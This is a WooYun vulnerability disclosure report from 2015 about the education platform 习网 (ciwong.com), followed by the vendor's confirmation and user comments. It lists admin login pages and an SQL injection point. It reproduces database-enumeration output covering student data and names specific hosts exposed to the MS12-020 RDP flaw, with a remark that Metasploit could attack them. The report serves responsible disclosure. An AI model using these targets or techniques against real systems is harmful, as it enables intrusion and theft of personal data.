当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092370

漏洞标题:习网问题整理打包

相关厂商:习网

漏洞作者: 爱上平顶山

提交时间:2015-01-17 21:11

修复时间:2015-03-03 21:12

公开时间:2015-03-03 21:12

漏洞类型:内容安全

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-17: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-03: 细节向公众公开

简要描述:

...

详细说明:

习网的一些问题整理下
1、后台:
Google bing下
后台:
http://jxhd.ciwong.com/
http://bbs.ciwong.com/login.aspx
http://super.admin.ciwong.com/Admin/Login
http://mail.ciwong.com/index.php
http://gwy2013.ciwong.com/lead/Login
http://anquan.ciwong.com/Account/Login/
http://e.ciwong.com/login/indexbefore
http://e.ciwong.com/login/
http://admin.eschool.ciwong.com/users/login
http://admin.ciwong.net/Permission/Login/Login
http://demo.ciwong.com/ 云平台
结合这个:

databases [132]:
[*] beehive_listenread
[*] beehive_pointmall
[*] beehive_synchronwork
[*] beehive_voicespeech
[*] beehivedb
[*] bookcase
[*] ciwong_colorful
[*] ciwong_newsmanagement
[*] ciwong_qr
[*] cloudreader
[*] cmsdata
[*] cw_6v68_settlement
[*] cw_admin_elearning
[*] cw_admin_elearning_bak
[*] cw_app_store
[*] cw_audio_video_db
[*] cw_basedapplications
[*] cw_chinadream
[*] cw_cooperator
[*] cw_dw
[*] cw_edu
[*] cw_elearning
[*] cw_elearning_bak
[*] cw_englishshow
[*] cw_eshop_cart
[*] cw_eshop_common
[*] cw_eshop_news
[*] cw_eshop_order
[*] cw_eshop_product
[*] cw_eshop_user
[*] cw_gwy
[*] cw_hd
[*] cw_homepage
[*] cw_jibei
[*] cw_jibei_school
[*] cw_learnmonth
[*] cw_microvideo
[*] cw_netschool
[*] cw_packager_arithmetic
[*] cw_packager_arithmetic_en
[*] cw_packager_ebook
[*] cw_packager_experiment
[*] cw_packager_experiment_v2
[*] cw_packager_kousuan
[*] cw_packager_learning_level
[*] cw_packager_listenning_ch
[*] cw_packager_listenning_ch_v2
[*] cw_packager_listenning_en
[*] cw_packager_listenning_en_v2
[*] cw_packager_playwords
[*] cw_packager_reading_ch
[*] cw_packager_reading_en
[*] cw_packager_speaking_en
[*] cw_pay
[*] cw_press
[*] cw_press_new
[*] cw_recommend
[*] cw_resx_center
[*] cw_settlement
[*] cw_trainingdb
[*] cw_workcategory
[*] cw_workcategory_arithmetic
[*] cw_workcategory_arithmetic_en
[*] cw_workcategory_common
[*] cw_workcategory_ebook
[*] cw_workcategory_experience
[*] cw_workcategory_experiment
[*] cw_workcategory_experiment_v2
[*] cw_workcategory_learning_level
[*] cw_workcategory_listenning_ch
[*] cw_workcategory_listenning_ch_v2
[*] cw_workcategory_listenning_en
[*] cw_workcategory_listenning_en_v2
[*] cw_workcategory_more
[*] cw_workcategory_playwords
[*] cw_workcategory_reading_ch
[*] cw_workcategory_reading_en
[*] cw_workcategory_settings
[*] cw_workcategory_speaking_en
[*] cw_workshop
[*] cw_workshop2
[*] cw_yishang
[*] cw_yishang1
[*] cw_yishang_settle
[*] cw_ziyuan
[*] cwapi
[*] cwfav
[*] db_ciliao
[*] db_filestatus
[*] db_kousuan100
[*] db_statistics
[*] db_txb
[*] db_txb_paipai
[*] efficientclassroom
[*] game
[*] gxktv3
[*] gxktv3_resource
[*] information
[*] information_schema
[*] microrecord
[*] mysql
[*] notebook_good
[*] notebook_mistake
[*] notebook_senten
[*] notebook_word
[*] performance_schema
[*] quesdata
[*] research
[*] research_ky
[*] roompermissionjingsai
[*] schoolzone
[*] searcher
[*] synchpreparation
[*] szdsy2013
[*] t_db_areaconf
[*] t_db_jibei
[*] t_db_listening
[*] t_db_markham
[*] t_db_roomtask
[*] t_db_tinyurl
[*] videouser
[*] wiki
[*] wikicommunity
[*] wikipoint
[*] wikiques
[*] wordstockchinese
[*] wordstockenglish
[*] wordstockenglishchangebuilding
[*] wordstockenglishchangeclassifying
[*] wordstockenglishchangescene
[*] wordstocktempresources
[*] work_listen
Database: beehive_listenread
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| h_stupracticeword        | 2225817 |
| h_studentworkpersentence | 1179092 |
| h_stupracticeread        | 1143587 |
| s_favorites              | 787644  |
| h_studentworkword        | 702708  |
| h_heardrank              | 320771  |
| v_workbook               | 310072  |
| s_workrecord             | 235518  |
| s_workanswer             | 216187  |
| h_stupractice            | 174053  |
| h_studentwork            | 139538  |
| h_teacherfixword         | 135150  |
| s_mybookshelf            | 119652  |
| e_s_work_item            | 119166  |
| v_saledetail             | 115829  |
| o_order_off_detail       | 115256  |
| h_studentvistor          | 82884   |
| s_publishques            | 47454   |
| h_unitword               | 43505   |
| e_s_work                 | 29547   |
| h_teacherworkdetail      | 20967   |
| s_publishquessummary     | 19550   |
| h_teacherpublishrecord   | 11344   |
| h_teacherwork            | 9817    |
| h_studentprivacy         | 6758    |
| p_agent_books            | 5840    |
| h_studentfollow          | 5674    |
| s_publishrecorddetails   | 5613    |
| h_unitcourse             | 5447    |
| s_publishpaper           | 4133    |
| h_units                  | 3759    |
| o_apply_free_record      | 3693    |
| questionbookversion      | 2786    |
| h_units_copy             | 1855    |
| s_question               | 1730    |
| tmp_booksresource        | 1391    |
| tmp_resourceversion      | 1390    |
| s_publishrecord          | 1324    |
| tmp_booksresource_bak    | 1164    |
| tmp_booksresource_bak2   | 1164    |
| s_questionsummary        | 711     |
| o_order_off_line         | 640     |
| o_order                  | 573     |
| e_t_work_chapter         | 562     |
| e_t_work_class           | 554     |
| o_openservicedetail      | 447     |
| s_book_areas             | 320     |
| e_t_work_record          | 308     |
| h_bookinfo               | 290     |
| p_class_recommend        | 276     |
| s_chapter                | 228     |
| o_service_message        | 223     |
| o_openservice            | 213     |
| h_bookinfo_copy1         | 169     |
| h_bookinfo_copy          | 168     |
| h_bookinfo_copy_copy     | 168     |
| s_chapter_copy           | 150     |
| s_paper                  | 149     |
| s_book_copy1             | 27      |
| s_book_copy              | 25      |
| s_template_kind          | 21      |
| p_message                | 10      |
| h_courseinfo             | 9       |
| s_book                   | 7       |
| s_book_template          | 4       |
+--------------------------+---------+
Database: beehive_pointmall
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| tb_goods         | 102     |
| tb_pointsrule    | 24      |
| tb_pointssummary | 19      |
| tb_goodscategory | 12      |
| tb_orders        | 11      |
| tb_address       | 7       |
| tb_supplier      | 5       |
| tb_notices       | 2       |
| tb_manager       | 1       |
+------------------+---------+
Database: beehive_synchronwork
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| studentworkquestiondetail | 6053    |
| studentwork               | 5493    |
| message                   | 1440    |
| publisherdetail           | 1140    |
| messageuser               | 1033    |
| workstatistical           | 722     |
| classworkpublicrec        | 685     |
| studentworddetail         | 619     |
| workpublish               | 388     |
| messageclass              | 369     |
| workcontent               | 293     |
| workcategory              | 122     |
| workstep                  | 111     |
| worksummary               | 10      |
+---------------------------+---------+
Database: beehive_voicespeech
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| voiceprop   | 373441  |
| voicespeech | 93360   |
+-------------+---------+
Database: beehivedb
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| a_settlement_order_detail    | 115723  |
| tb_classmember               | 85263   |
| tb_groupmember               | 84710   |
| tb_classmember_20140627_1520 | 60961   |
| tb_classproduct              | 664     |
| tb_users                     | 579     |
| tb_productuse                | 492     |
| tb_areas                     | 466     |
| tb_products                  | 457     |
| a_settlement_detail          | 341     |
| appmanager                   | 226     |
| tmp_user_service_record      | 218     |
| tmp_proxyschoolopen          | 215     |
| tb_bank_account              | 205     |
| tb_schoolmodules             | 166     |
| tb_schoolproxy               | 147     |
| tb_schoolinfo                | 142     |
| a_settlement_type_detail     | 67      |
| tb_app_menurole              | 65      |
| tb_areaproxy                 | 46      |
| tb_productsorder             | 29      |
| a_settlement_remark          | 25      |
| tb_app_menu                  | 25      |
| tb_procate                   | 24      |
| course                       | 23      |
| a_settlement_record          | 20      |
| tb_proxyproduct              | 20      |
| tb_apprecommend              | 17      |
| tb_schoolmanager             | 12      |
| tb_app_itemrole              | 10      |
| tb_app_menuitem              | 10      |
| tb_app_role                  | 6       |
| tmp_proxyyearopen            | 6       |
| tb_bank_pay_record           | 5       |
| stage                        | 4       |
| tb_appinfo                   | 3       |
| tb_modules                   | 3       |
| a_settlement_rate            | 1       |
| tb_appuserrole               | 1       |
| tb_myproducts                | 1       |
+------------------------------+---------+
Database: bookcase
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| paperlist     | 632983  |
| bookshelflist | 538160  |
| ebookstep     | 407616  |
| paperclip     | 189647  |
| ebooktheme    | 41311   |
| mybookshelf   | 23656   |
| bookmark      | 3946    |
| recommendbook | 32      |
+---------------+---------+
Database: ciwong_colorful
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| tb_hist_testexercises | 7760    |
| tb_cmt_comment        | 557     |
| tb_uer_usermsg        | 242     |
+-----------------------+---------+
Database: ciwong_newsmanagement
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| newsdetails             | 401     |
| newsdetailsassistant    | 401     |
| newscategoryrelation    | 203     |
| competitionnews         | 139     |
| newscompetitionrelation | 126     |
| newscategory            | 22      |
| newsfrom                | 4       |
+-------------------------+---------+
Database: ciwong_qr
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| personalcard | 436791  |
| classcard    | 81708   |
| app          | 5       |
+--------------+---------+
Database: cloudreader
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| tb_creditsrecord       | 27854   |
| tb_dynamic             | 7232    |
| tb_recentvisitors      | 7101    |
| tb_review              | 6705    |
| tb_taskdetail          | 3203    |
| tb_dotask              | 1935    |
| tb_content             | 1835    |
| tb_autostudytestreport | 1764    |
| tb_ucrelation          | 1455    |
| tb_user                | 1434    |
| tb_recommend           | 1226    |
| tb_errorquesnote       | 777     |
| tb_article             | 620     |
| v_totaldotask          | 378     |
| v_totalreview          | 336     |
| tb_quesoption          | 318     |
| tb_questext            | 279     |
| tb_ques                | 278     |
| tb_userdetail          | 224     |
| v_totalstudyreview     | 156     |
| tb_section             | 138     |
| tb_attachment          | 129     |
| tb_photo               | 118     |
| tb_relation            | 85      |
| tb_albums              | 79      |
| tb_task                | 64      |
| tb_menu                | 60      |
| tb_classlearninggroup  | 54      |
| tb_topic               | 46      |
| tb_privateletter       | 45      |
| tb_unit                | 42      |
| tb_book                | 41      |
| v_totaltopstudyreview  | 34      |
| v_totaltopreview       | 29      |
| tb_creditsrules        | 28      |
| tb_creditgradedetail   | 22      |
| tb_type                | 15      |
| tb_apprequesservices   | 10      |
| tb_schoolinfo          | 6       |
| tb_openservices        | 5       |
| tb_topteacherteam      | 5       |
| tb_services            | 1       |
+------------------------+---------+
Database: cmsdata
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| syslog                   | 23016   |
| sitepagetemplaterelation | 9721    |
| moduletemplaterelation   | 3211    |
| templateconfig           | 498     |
| moduleconfig             | 427     |
| domainsiterelation       | 387     |
| domainconfig             | 73      |
| task                     | 31      |
| siteextendinfo           | 19      |
| sitetype                 | 8       |
+--------------------------+---------+
Database: cw_6v68_settlement
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| settlement            | 25996   |
| settlementrelation    | 6691    |
| settlementdatasynclog | 124     |
| userrightrelation     | 89      |
| shopaudit             | 70      |
| publisheraudit        | 42      |
| userrolerelation      | 25      |
| agentinfo             | 19      |
| auditrecords          | 10      |
| userright             | 9       |
| userinfo              | 8       |
| roleinfo              | 6       |
+-----------------------+---------+
Database: cw_admin_elearning
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| admin                    | 3988    |
| site_admin               | 3984    |
| siteinfo                 | 3913    |
| siteinfo_new             | 3674    |
| admin_new                | 3671    |
| sitemodule               | 3574    |
| tmp_tb4                  | 3309    |
| tmp2_tb                  | 3304    |
| tmp_tb3                  | 3304    |
| site_admin_bak           | 392     |
| siteinfo_bak             | 370     |
| admin_bak                | 367     |
| siterecommendapplication | 13      |
| sitemodule_bak           | 8       |
| sitenavigation           | 7       |
| `module`                 | 6       |
| sitefriendlylink         | 5       |
| sqlmapfile               | 3       |
| deploy                   | 2       |
| newsarea                 | 2       |
| sitebanner               | 2       |
| newsinfo                 | 1       |
| sitelogo                 | 1       |
+--------------------------+---------+
Database: cw_dw
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| dw_user_learning_history        | 14689703|
| user_learning_records           | 7756018 |
| dw_learnning_words              | 2292036 |
| chapterreport                   | 1710845 |
| dw_user_answer_detail_history   | 1686803 |
| dw_user_answers_statistics      | 676806  |
| workreport                      | 488690  |
| dw_user_learning_history_record | 7       |
+---------------------------------+---------+


结合这些账户密码 会达到是什么效果 自己评估吧。
2、
http://game.ciwong.com/game/Play/1315'

0.jpg


game.ciwong.com 下这样的很多
3、bbs
http://bbs.ciwong.com/ReadMe.txt 还有一些列目录 自查
http://www.6v68.com/Areas/ 列目录
http://www.6v68.com/admin/
http://113.106.50.4:81/admin/

0.jpg


4、
MS12-020 蓝屏漏洞 没有升级补丁
rdp://121.14.117.223:6543
rdp://121.14.117.26:6543
rdp://113.106.50.9:6543
可用metasploit直接攻击 不做测试了
ok 就这样

漏洞证明:

···

修复方案:

改。

版权声明:转载请注明来源 爱上平顶山@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-01-19 15:19

厂商回复:

漏洞修复中...

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-02 20:34 | Forever80s ( 普通白帽子 | Rank:820 漏洞数:110 )

    系统漏洞楼主也扫了?

  2. 2015-03-02 20:46 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @Forever80s 顺带的兄弟 我看好你兄弟~

  3. 2015-03-02 22:38 | Forever80s ( 普通白帽子 | Rank:820 漏洞数:110 )

    @爱上平顶山 多谢!feng兄,我已默默关注你好久了呵呵